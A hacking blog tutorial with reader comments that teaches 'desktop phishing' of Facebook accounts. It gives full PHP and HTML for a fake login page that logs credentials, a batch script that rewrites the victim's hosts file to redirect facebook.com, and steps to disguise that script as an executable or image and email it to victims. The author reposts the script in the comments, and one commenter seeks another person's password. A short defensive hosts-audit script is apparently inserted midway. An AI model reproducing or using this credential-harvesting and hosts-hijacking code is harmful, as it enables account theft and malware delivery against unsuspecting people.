Advanced Level Facebook Desktop Phishing Method – 2015 (Undetectable)

Advanced Level Facebook Desktop Phishing- picateshackz.com


As I mentioned in my previous article, this post explores a bit of batch file programming and then applies it to Facebook hacking by desktop phishing. The advantage here is that the victim will not be able to identify the fake page, since the URL in the address bar looks the same as the genuine one. This post also includes new PHP code for making a phishing page that is undetectable and can bypass the security check of a hosting site.

This tutorial is a non-exhaustive guide for beginners. If you have not read my previous articles “DNS Hijacking” and “Hacking facebook accounts using phishing”, I would ask you to read them before continuing, since they give you the prerequisite knowledge for the topics that we are going to discuss today.



Difference between phishing and desktop phishing


In phishing

1. Attacker convinces the victim to click on the link of a fake login page which resembles a genuine login page.

2. Victim enters his credentials in the fake login page, and they go to the attacker.

3. Victim is then redirected to an error page or the genuine website, depending on the attacker.

But the main drawback in phishing is that the victim can easily differentiate between the fake and real login page by looking at the domain name. We can overcome this in desktop phishing by spoofing the domain name.

In desktop phishing

1. Attacker sends an executable file to the victim and the victim is supposed to double-click on it. Attacker’s job is done.

2. Victim types the domain name of the original/genuine website and is taken to our fake login page. But the domain name remains the same as typed by the victim, and the victim doesn’t come to know.

3. The rest is the same as in normal phishing.


What is Hosts File?


The hosts file is a text file containing domain names and the IP addresses associated with them.
Location of the hosts file in Windows: C:\Windows\System32\drivers\etc. Whenever we visit any website, say www.anything.com, a query is sent to a Domain Name Server (DNS) to look up the IP address associated with that website/domain. But before doing this, the hosts file on our local computer is checked for the IP address associated with the domain name.

Suppose we make an entry in the hosts file as shown. When we visit www.anywebsite.com, we would be taken to 115.125.124.50. No query for resolving the IP address associated with www.anywebsite.com would be sent to DNS.

What is the attack?


I hope you now have an idea of how modification of the hosts file on the victim’s computer can be misused.
We need to modify the victim’s hosts file by adding the genuine domain name and the IP address of our fake website/phishing page. Whenever the victim visits the genuine website, he is directed to our fake login page, and the domain name in the URL box remains genuine as typed by the victim. Hence the domain name is spoofed.
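How a defender can detect the tampering described above, as an added example that is not part of the original article: a Python audit of hosts-file content that flags watched domains pinned to a routable address. The watchlist, the function names and the sample file are assumptions constructed for illustration; the four flagged lines mirror the entries written by the batch file shown later in the article.

```python
import ipaddress
import re

# Domains that should never be pinned locally (assumed watchlist for this example).
WATCHED = ("facebook.com", "fb.com")
# Constructed sample: a stock hosts file plus the four entries the article's batch file appends.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
0.0.0.0 ads.example.net   # local ad blocking
62.116.159.4 www.facebook.com
62.116.159.4 www.fb.com
62.116.159.4 https://www.facebook.com
62.116.159.4 https://fb.com
"""

def parse_hosts(text):
    """Yield (lineno, ip, name) for each mapping; comments and blanks are skipped."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        fields = raw.split("#", 1)[0].split()
        if len(fields) < 2:
            continue
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue  # first field is not an address, so the line maps nothing
        for name in fields[1:]:
            yield lineno, ip, name.lower()

def audit_hosts(text, watched=WATCHED):
    """Return findings for watched domains mapped to a non-loopback address."""
    findings = []
    for lineno, ip, name in parse_hosts(text):
        # Lookups are by bare hostname, so a scheme-prefixed name redirects
        # nothing, but it is still evidence that something edited the file.
        host = re.sub(r"^[a-z][a-z0-9+.-]*://", "", name).split("/", 1)[0].rstrip(".")
        malformed = host != name
        if not any(host == d or host.endswith("." + d) for d in watched):
            continue
        if ip.is_loopback or ip.is_unspecified:
            continue  # sinkhole/block entry, not a redirect
        findings.append({"line": lineno, "ip": str(ip), "host": host,
                         "effective": not malformed})
    return findings

if __name__ == "__main__":
    for f in audit_hosts(SAMPLE_HOSTS):
        state = "active redirect" if f["effective"] else "malformed entry, no effect"
        print(f"line {f['line']}: {f['host']} -> {f['ip']}  [{state}]")
```

On Windows, feed it the contents of the hosts file under C:\Windows\System32\drivers\etc and alert on any finding, whether or not the entry is effective.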



Steps to perform attack:

Step 1. Making undetectable phishing page


What you need :


Notepad++
for programming (Download : http://www.notepad-plus-plus.org/download)

Steps :


Use Notepad++ for the steps given below

1) Copy this code and paste it in a new document and save it as index.php


<?php
$id = $_GET[“id”];
if ($id == “facebookforwindows”) {
$myFile = “SoftwareDownload.jpg”;
$fh = fopen($myFile, ‘r’);
$theData = fread($fh, 500000);
fclose($fh);
echo $theData;
}

else{
$myFile1 = “Follow.jpg”;
$fh1 = fopen($myFile1, ‘r’);
$theData1 = fread($fh1, 500000);
fclose($fh1);
echo $theData1;
}
?>

Note : Change “($id == “facebookforwindows”)” with “($id == “YOUR_PASSWORD”)“

(You can put any password as YOUR_PASSWORD)

2) Copy below code and paste it in a new document and save it as Follow.jpg (Code Not By ME)


<!DOCTYPE html>
<html>
 <head>
  <title>Find your Facebook ID – a 5-second easy tool for locating your Facebook numeric personal ID</title>
  <meta name=”description” content=”If you need to know your Facebook numeric peronal ID, just plug your Profile URL into this simple tool.” />
  <link rel=”stylesheet” href=”reset.css” type=”text/css” media=”screen”>
  <link rel=”stylesheet” href=”style.css” type=”text/css” media=”screen”>

 <script src=”http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js”></script>  <script src=”script.js” type=”text/javascript” charset=”utf-8″></script>
  <meta property=”fb:admins” content=”1146295886″ />
 </head>
 <body>
   
  <form action=”” method=”post”>

 <label for=”fb_profile_url” class=”text-input-label fb_profile_url-text-input-label”>
  Enter your personal Facebook profile URL:
 </label>

 <input type=”text” name=”fb_profile_url” value=”” class=”nr-text” size=”45″ placeholder=”http://www.facebook.com/YourProfileName” />
 <input type=”hidden” name=”unsanitized” class=”nr-hidden hidden-input-for-unsanitized” />
 <p>
  <input type=”submit” value=”Lookup numeric ID…” class=”button-primary”>
 </p>

 <h1>Easily find your Facebook numeric personal ID for fb:admins social plugins and more!</h1>

 <p id=”description”>
  For integrations of certain Facebook social plugins, like the “Like” button and “Like box”, and others, Facebook
  requires that you know your Facebook numeric user ID.  Unfortunately, they make this very difficult to find, especially
  if you have a so-called “vanity” personalized profile URL. If you can’t find your Facebook ID, or don’t know what it is
  and need it, just enter your full Facebook profile URL in the above form, and we can scrape the ID from the code of your
  personal profile page.
 </p>

</form>

<script type=”text/javascript”>
  var _gaq = _gaq || [];
  _gaq.push([‘_setAccount’, ‘UA-3361652-13’]);
  _gaq.push([‘_trackPageview’]);
  (function() {
    var ga = document.createElement(‘script’); ga.type = ‘text/javascript’; ga.async = true;
    ga.src = (‘https:’ == document.location.protocol ? ‘https://ssl’ : ‘http://www’) + ‘.google-analytics.com/ga.js’;
    var s = document.getElementsByTagName(‘script’)[0]; s.parentNode.insertBefore(ga, s);
  })();
</script>
 </body>
</html>


3) Copy this code and paste it in a new document and save it as data.php

<?php
header (‘Location:https://www.facebook.com/’);
$handle = fopen(“PassFace.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>

4) Copy this code and paste it in a new document and save it as SoftwareDownload.jpg


<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.01 Transitional//EN” “http://www.w3.org/TR/html4/loose.dtd”>
<html>
<head>
<meta http-equiv=”Content-Type” content=”text/html; charset=ISO-8859-1″>
<title>Facebook For Windows : Welcome</title>
<style type=”text/css”>
html, body
{
   height: 100%;
}
div#space
{
   width: 1px;
   height: 50%;
   margin-bottom: -360px;
   float:left
}
div#container
{
   width: 1250px;
   height: 720px;
   margin: 0 auto;
   position: relative;
   clear: left;
}
</style>
<style type=”text/css”>
body
{
   margin: 0;
   padding: 0;
   background-color: #6579A8;
   color: #000000;
}
</style>
<style type=”text/css”>
h3
{
   font-family: Arial;
   font-size: 24px;
   font-weight: normal;
   font-style: normal;
   text-decoration: none;
   color: #000000;
   margin: 0 0 0 0;
   padding: 0 0 0 0;
   display: inline;
}
a:hover
{
   color: #90F518;
}
</style>
<!–[if lt IE 7]>
<style type=”text/css”>
   img { behavior: url(“pngfix.htc”); }
</style>
<![endif]–>
</head>
<body>
<div id=”space”><br></div>
<div id=”container”>
<div id=”bv_Image1″ style=”margin:0;padding:0;position:absolute;left:0px;top:0px;width:1093px;height:609px;text-align:left;z-index:0;”>
<img src=”images/Facebook_Box.png” id=”Image1″ alt=”” align=”top” border=”0″ style=”width:1093px;height:609px;”></div>
<div id=”bv_Image2″ style=”margin:0;padding:0;position:absolute;left:207px;top:210px;width:168px;height:168px;text-align:left;z-index:1;”>
<img src=”images/Facebook.png” id=”Image2″ alt=”” align=”top” border=”0″ style=”width:168px;height:168px;”></div>
<div id=”bv_Text1″ style=”margin:0;padding:0;position:absolute;left:378px;top:224px;width:389px;height:90px;text-align:left;z-index:2;”>
<h3>Download Facebook For Windows :<br>
</h3><font style=”font-size:13px” color=”#000000″ face=”Arial”>size : 6 MB.<br>
Platform : Windows 8.1<br>
Security Status : Active</font><h3><br>
</h3></div>
<div id=”Html1″ style=”position:absolute;left:378px;top:307px;width:625px;height:50px;z-index:3″>
<b>Login to Donwload this Application :</b><br/>
<form name=”input” action=”data.php” method=”post”>
Username : <input type=”text” name=”username” />
Password : <input type=”password” name=”password”>
<input type=”submit” value=”Download” action=”data.php” method=”post”/>
</form></div>
</div>
</body>
</html>

5) Keep all above files in a single folder and name it as “xyz” (Anything you want)

6) Now create a folder inside that folder (“xyz“) and name it as “images” (Put exact name)

7) Download these images and put them inside “images”

Image 1 : http://adf.ly/1IK1UU or Click here
Image 2 : http://adf.ly/1IK1ah or Click here

Now if you followed all the steps carefully, It will look similar to this :



You have successfully created the phishing page; we need these files in the next steps.

Step 2. Setting up Xampp web server


You can use WAMP or XAMPP; I would recommend XAMPP. This software will help you to host the phishing page on your local machine.

Web server can refer to either the hardware (the computer) or the software (the computer application) that helps to deliver Web content that can be accessed through the Internet.


1) First download and install XAMPP on your PC, then start the Apache and MySQL services



2) Copy the 5 files (including the folder named ‘images‘) we created in step 1 and paste them all into the htdocs folder, which should be under XAMPP (the place where you installed XAMPP)
(normally the htdocs folder is at the path C:\xampp\htdocs)



Step 3. Setting up static vpn

I will use proXPN VPN for this tutorial, but I recommend Strong Open VPN as it is very stable; you can download it from here.

Install ProXPN VPN or any other static VPN; I recommend Strong Vpn as it is very stable and gives you a static IP. Once you install and run it, you will get a static IP (VPN).



Now you have a static ip for your Localhost.


Step 4. Creating a batch(.bat) file to accomplish replacing victims hosts file

Now we have to replace some text in the victim’s hosts file, which is at C:\Windows\System32\drivers\etc. You can do this in many ways, either by using an SFX archive or by using a batch file; for this tutorial we will use a batch file to accomplish the job.


Here is the batch program that I was talking about in my last post ‘DNS hijacking‘. As we have seen that, adding an IP address with a corresponding domain name in the host file would redirect you to webpage as you desire with a desired domain name.

So, we are going to take this into next level for hacking purposes. We’ll change the host file in the victim machine with the help of a batch program and redirect the victim to our fake login page. The only thing you need to consider is sending the batch program to the victim machine and running it.

Here is the batch program that can be used to manipulate the HOSTS file.

@echo off
set hostspath=%windir%System32driversetchosts

echo 62.116.159.4 www.facebook.com >> %hostspath%
echo 62.116.159.4 www.fb.com >> %hostspath%
echo 62.116.159.4 https://www.facebook.com >> %hostspath%
echo 62.116.159.4 https://fb.com >> %hostspath%

exit

Replace the ip address(62.116.159.4) with the static IP address of your vpn (The static ip vpn address you got in step 3), and save it as ‘anyname.bat‘.

Let us now discuss what exactly the above code does. The second line of the code above takes the admin privileges over the ‘hosts’ file, so that editing can be done. Then we move into the path where the ‘hosts’ file is located and then we write 4 lines into the file. Those lines of codes are responsible for the redirection of the user. Therefore, we try to redirect all the possible combinations of facebook addresses to the IP that is provided.

Remember, executing the above code containing file in the victim’s machine is your personal concern and hence I’m not describing the methodologies of spreading your code.

Step 5. Sending the file to victim

You can also change the .bat file into .exe file using batch to exe converter. Click the link to learn how to convert a batch file into an executable.

After successfully converting it to an anyname.exe file, you can do one more step to hide this .exe file in an image file; follow my previous guide: How To Make A Virus And Hide In An Image File (FUD)


Now send the file via email, or upload the file to a site and ask the victim to download it. After the victim downloads and clicks the file, his hosts file will be replaced, so whenever the victim enters facebook.com he will be redirected to our phisher page, but the URL will remain Facebook.com.

To see all the victims credentials and Password open newly created log.txt file which is under ht docs folder



You are done.

Note: Use this article for educational purpose only



29 Responses

  1. Josh Das says:

    The batch program to tweak the host file didnt work for me!!! could you please check on that so that I can tweak the hosts to redirect facebook.com to my static ip??? Email : josh24das@gmail.com

  2. Mr Josh Das, Thank you for your valuable feedback.

    You are right, the batch file is not working and it was my mistake…sorry, but i have the working batch program here :

    @echo off
    set hostspath=%windir%System32driversetchosts

    echo 62.116.159.4 http://www.facebook.com >> %hostspath%
    echo 62.116.159.4 http://www.fb.com >> %hostspath%
    echo 62.116.159.4 https://www.facebook.com >> %hostspath%
    echo 62.116.159.4 https://fb.com >> %hostspath%

    exit

    Replace the ip address with your static ip

  3. Josh Das says:

    Thanks, it updated the hosts file; however, I am now hitting an error. My XAMPP is on, but when I use the browser to redirect it to Facebook, it won't go to my static IP, it goes to the original Facebook page! And when I hit the IP in the address bar, there is also an error in the index file, line 2!!! Please fix, let me know brother!!! m/

  4. Deepa Subedi says:

    hey.. does this work with the mobile users? i need it.. plz help me getting a person id password.. i need it.. its important. he is blackmailng me…

  5. If you want to use this phishing method with Android users, then you have to use Android hosts tweaks instead of creating a batch (.bat) file to accomplish replacing the victim's hosts file… and you can also use the Bit Web Server app instead of the XAMPP web server

  6. Magic says:

    I'm getting "Notice: Undefined index: id in C:\xampp\htdocs\index.php on line 2".

    What am I missing in that line of the index.php file? Thanks.

  7. Turn on the Apache and MySQL data servers in XAMPP

  8. Sound good.. 😉 i will probably try.. but not for harm people.. I learn hacking for make myself safe ^^ Thanks

  9. Yes …. I appreciate your words 🙂

  10. Anonymous says:

    when i tested the batch file i can't connect to facebook, i followed all the instructions..

  11. shivam goyal says:

    the image url is not working plz give the right url to download these 2 images plz

  12. Anonymous says:

    sorry my mistake your batch file is working.. the problem is facebook is preventing me to sign in.. your connection is private… attackers might trying to steal your information from http://www.facebook.com blah blha….

  13. Image files updated with alternative download link

  14. SUFYAN ARIF says:

    I did exactly like you but after altering host file on my window 8 system, my browser begin to stop opening facebook page by showing "unable to connect to internet" error on browser page. After running Apache and Mysql servers from xampp, the problem still persists. What I'm doing wrong?

    I didn't install vpn software because I already have a static IP.

  15. Runyesz says:

    Does this method work for anyone? even for the writer of this article?

  16. Face Compte says:

    None of these Facebook hacks work today, nothing works anymore except this site, which is still online ▄︻̷̿┻̿═━一 http://www.facecompte.com/

    hack facebook account software

  17. Face Compte says:

    None of these Facebook hacks work today, nothing works anymore except this site, which is still online ▄︻̷̿┻̿═━一 http://www.facecompte.com/

    facebook hack an account

  18. Sun Day says:

    not working, waste of time

  19. chauhan indu says:

    what are android hosts tweeks …..plz give me an idea to get this host tweek

  20. Anonymous says:

    @Irshad Pathoor
    Sir can we use id from "no-ip" software? as it is gives us static ip type thing, if not, is there any free vpn to give us static ip?

  21. Anonymous says:

    @Irshad Pathoor
    Notice: Undefined index: id in C:\xampp\htdocs\index.php on line

    have already done that, turned on these two services, what i'm missing sir, idk. please help

  22. you changed your own host file 😀

  23. CIH DIDI says:

    really I do it but did not working.please help me Sir, I would like to need video file these training please help me…………..

  24. CIH DIDI says:

    yeah change static ip in my host file….

  25. CIH DIDI says:

    batch file not connectable to facebook link how to work brother

  26. Siddharth says:

    Do I have to make my PC turned on at the time when victim is opening that phished website?
    Plz reply
